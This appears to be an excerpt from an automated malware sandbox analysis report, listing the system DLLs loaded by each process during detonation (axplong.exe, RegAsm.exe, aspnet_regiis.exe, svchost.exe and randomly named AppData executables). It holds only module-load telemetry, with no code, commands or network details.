                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: dwrite.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: msvcp140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: msisip.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: wshext.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: appxsip.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: opcservices.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: esdsip.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: sxs.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: scrrun.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: linkinfo.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: secur32.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: rstrtmgr.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dll
